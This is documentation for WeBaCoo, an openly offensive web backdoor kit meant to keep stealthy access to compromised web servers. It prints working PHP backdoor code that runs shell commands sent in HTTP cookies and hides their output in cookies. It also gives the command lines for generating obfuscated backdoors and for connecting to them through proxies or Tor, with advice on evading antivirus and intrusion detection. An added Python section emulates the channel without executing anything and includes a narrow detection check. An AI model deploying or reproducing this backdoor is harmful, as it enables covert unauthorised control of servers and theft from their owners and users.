Documentation
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server.
WeBaCoo was designed to operate under the radar of modern, up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealthy mechanism for executing commands on the compromised server. The obfuscated communication is carried in the Cookie fields of HTTP headers, inside valid client HTTP requests and the web server's corresponding responses.
The script-kit has two main operation modes: generation and "terminal". In generation mode the user creates the backdoor code containing the PHP payload. In remote "terminal" mode the client connects to the compromised server where the backdoor PHP code has been injected. To establish the remote "pseudo"-shell, the user must provide the URL of the server path containing the injected code.
The following image describes in detail how client and server communicate under WeBaCoo.
What needs to be emphasized here is that every interaction between client and server is carried in the HTTP Cookie header. Unlike other similar tools, WeBaCoo does not return command output to the client in the HTTP response body (the HTML data). Instead it uses a buffering mechanism to capture the output and sends it encoded to the client in an HTTP cookie.
The design concept behind the backdoor PHP code is to provide a stealthy way to send the commands' output back to the client. This is achieved with PHP's output buffering feature, which buffers the output of the executed command before it is sent to the client. To execute system commands, variants of PHP's command-execution functions (system, exec, popen and so on) are selectable in WeBaCoo generation mode.
As described in the communication paragraph above, a single client request carries 3 crucial values in the HTTP Cookie header:
- "cm": base64 encoded shell command
- "cn": the new cookie name that the server will use to send the encoded output
- "cp": the delimiter used to wrap the encoded output
If a fixed delimiter is not set by the user, a new random one is generated for each request. Using the random delimiter is strongly advised for better stealth: a fixed cookie name and delimiter are a static pattern that can be matched in traffic.
To clarify the backdoor code usage, the raw code output (taken with the -r flag) was beautified and is presented with the relevant comments as follows:
```php
<?php
# Check whether the "cm" cookie was sent with the page request
if (isset($_COOKIE['cm'])) {
    # Start output buffering
    ob_start();
    # Decode and execute the command passed in the "cm" cookie
    system(base64_decode($_COOKIE['cm']) . ' 2>&1');
    # Get the output buffer's content -> encode it -> wrap it in the head
    # and tail delimiter taken from "cp" -> set a cookie whose name is
    # taken from the "cn" value
    setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']);
    # Erase the output buffer and stop buffering
    ob_end_clean();
}
```
PS: in the generated code, the base64 decoder's function name is retrieved through string manipulation tricks for stealth reasons (refer to the Appendix for more info). The code shown above has been intentionally left in its plain form for better readability.
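The exchange described above, emulated end to end in Python as an added example. This is not WeBaCoo's own code and not the Perl client's implementation: the server side mirrors the PHP shown on this page but executes nothing (a constructed dict, FAKE_SHELL, stands in for system()), and the function names are this example's own. It assumes the PHP behaviour that incoming cookie values are URL-decoded into $_COOKIE and that setcookie() URL-encodes the value it sets, so base64's +, / and = travel percent-encoded; the client therefore decodes the Set-Cookie value before stripping the delimiter. It also includes a defender's check, detect_webacoo_exchange(), which flags a request/response pair matching the pattern of the code as shown.

```python
"""Offline emulation of the WeBaCoo cookie channel described above.

Added example, not WeBaCoo's own code. The server side mirrors the PHP
shown on this page but executes nothing: FAKE_SHELL, a constructed dict,
stands in for system(). All function names here are this example's own.
PHP URL-decodes incoming cookie values into $_COOKIE and setcookie()
URL-encodes outgoing ones, so both sides do the same here.
"""
import base64
import re
import secrets
import string
from typing import Dict, Optional
from urllib.parse import quote_plus, unquote_plus

# Constructed stand-in for the shell: keys are commands, values their output.
FAKE_SHELL = {
    "id": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
    "uname -a": "Linux web01 3.2.0 #1 SMP x86_64 GNU/Linux\n",
}


def random_delimiter(length: int = 4) -> str:
    """Per-request random delimiter, the behaviour the page recommends over a fixed one."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into a dict and URL-decode the values, as PHP does for $_COOKIE."""
    pairs = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs[name.strip()] = unquote_plus(value.strip())
    return pairs


def build_request_cookie(command: str, cookie_name: str, delimiter: str) -> str:
    """Client side: Cookie header value carrying cm (command), cn (reply name), cp (delimiter)."""
    cm = base64.b64encode(command.encode()).decode()
    fields = {"cm": cm, "cn": cookie_name, "cp": delimiter}
    return "; ".join(f"{k}={quote_plus(v)}" for k, v in fields.items())


def emulate_server_response(cookie_header: str) -> str:
    """Server side, mirroring the PHP: the Set-Cookie value, or '' when no cm cookie is present."""
    c = parse_cookie_header(cookie_header)
    if "cm" not in c:
        return ""                                   # isset($_COOKIE['cm']) failed
    command = base64.b64decode(c["cm"]).decode()
    # Output of system(... .' 2>&1') captured by ob_start(); here a lookup, nothing runs.
    output = FAKE_SHELL.get(command, f"sh: 1: {command}: not found\n")
    payload = c["cp"] + base64.b64encode(output.encode()).decode() + c["cp"]
    return f"{c['cn']}={quote_plus(payload)}"       # setcookie($_COOKIE['cn'], ...)


def parse_response_cookie(set_cookie: str, cookie_name: str, delimiter: str) -> str:
    """Client side: pull the delimited base64 output back out of the Set-Cookie header."""
    name, _, rest = set_cookie.partition("=")
    if name.strip() != cookie_name:
        raise ValueError("Set-Cookie name does not match the cn we sent")
    value = unquote_plus(rest.split(";")[0].strip())  # drop Path=/ etc. if present
    d = re.escape(delimiter)
    m = re.fullmatch(d + r"([A-Za-z0-9+/=]*)" + d, value)
    if not m:
        raise ValueError("reply is not wrapped in the cp delimiter")
    return base64.b64decode(m.group(1)).decode()


def round_trip(command: str, cookie_name: str = "Test-Cookie",
               delimiter: Optional[str] = None) -> str:
    """One full exchange: build the request, get the emulated server's reply, decode it."""
    delimiter = delimiter or random_delimiter()
    request = build_request_cookie(command, cookie_name, delimiter)
    response = emulate_server_response(request)
    return parse_response_cookie(response, cookie_name, delimiter)


def detect_webacoo_exchange(cookie_header: str, set_cookie: str) -> bool:
    """Defender's view of one request/response pair: cm/cn/cp in the request and a
    response cookie named cn whose value is wrapped in cp. Matches the PHP as shown;
    an operator who renames the request cookies in the generated code defeats it."""
    c = parse_cookie_header(cookie_header)
    if not {"cm", "cn", "cp"}.issubset(c):
        return False
    name, _, rest = set_cookie.partition("=")
    value = unquote_plus(rest.split(";")[0].strip())
    return name.strip() == c["cn"] and value.startswith(c["cp"]) and value.endswith(c["cp"])


if __name__ == "__main__":
    print(round_trip("id"), end="")
```

The whole command output rides in one Set-Cookie header, exactly as the PHP above does it; nothing in that code splits long output, so anything beyond the header size a server or proxy accepts is lost. The detection function is deliberately narrow: it keys on the fixed request cookie names and on the reply cookie echoing cn and cp, which is the structural signature of this channel rather than of any particular command.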
- Generate obfuscated backdoor code in the "my_backdoor.php" file using the default settings
webacoo.pl -g -o my_backdoor.php
- Generate obfuscated backdoor code in the "my_backdoor2.php" file using the "exec" payload (#3). The detailed list of the available functions can be obtained from the help (-h) page or the README file.
webacoo.pl -g -o my_backdoor2.php -f 3
- Generate the raw (non-obfuscated) backdoor code in the "raw_backdoor.php" file using the "popen" payload (#5).
webacoo.pl -g -o raw_backdoor.php -f 5 -r
- Connect to the server by accessing the -u web_path with the default settings
webacoo.pl -t -u http://10.0.1.11/backdoor.php
- Connect to the server by accessing the -u web_path using "Test-Cookie" as cookie name and "TtT" as delimiter
webacoo.pl -t -u http://10.0.1.11/backdoor.php -c "Test-Cookie" -d "TtT"
- Connect to the server through an HTTP proxy by accessing the -u web_path using "Test-Cookie2" as cookie name and "TtTt" as delimiter
webacoo.pl -t -u http://10.0.1.11/backdoor.php -c "Test-Cookie2" -d "TtTt" -p 10.0.1.4:8080
- Connect to the server over the Tor network by accessing the -u web_path using "My-Cookie" as cookie name
webacoo.pl -t -u http://example.com/backdoor.php -c "My-Cookie" -p tor
- For new string manipulation techniques to bypass base64 decoder detection, refer to the relevant blog post.
- A detailed analysis of the techniques used to bypass statistical malware analysis methods is available here.
- Additional material and detailed usage examples for WeBaCoo can be found on the developer's blog.
Latest WeBaCoo version: 0.2
Last update at December 19 2011